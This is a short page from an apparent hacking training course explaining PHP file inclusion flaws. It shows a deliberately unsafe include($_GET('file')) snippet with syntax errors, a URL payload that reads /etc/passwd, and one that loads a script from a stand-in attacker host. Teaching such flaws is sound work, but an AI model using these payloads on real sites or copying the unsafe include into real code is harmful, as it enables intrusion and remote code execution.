Hackmyfortress - Hacking Training Center - En/Fr

Adrien-fr

127.7K views

GitHub

Open Source Your Knowledge, Become a Contributor

Technology knowledge has to be shared and made accessible for free. Join the movement.

Create Content

Previous: XSS vulnerability Next: File upload vulnerability

The include fault

The include () function in PHP is used to execute php code that is located in another file. Example:

<?php

include(bth.php)

In this case, the code in bth.php will be executed.

If the developer writes this code:

<?php

include($_GET('file'));

To exploit this vulnerability, we can use the following URL:

monsite.tld/index.php?file=/etc/passwd

Here the "include" function will include the text of the "/ etc / passwd" file, and thus display its contents. It is possible to change "/ etc / passwd" to another server file that is normally not accessible, or even remote code accessible from another server.

Exemple :

monsite.tld/index.php?file=http://badsite.tmld/script.txt

Open Source Your Knowledge: become a Contributor and help others learn. Create New Content

Open Source Your Knowledge, Become a Contributor

13/15 Include vulnerability

The include fault

Discover FortressJS - A fast, secure and easy I/O framework

Python from Zero to Hero

Exercice Javascript

StockPrice Max Profit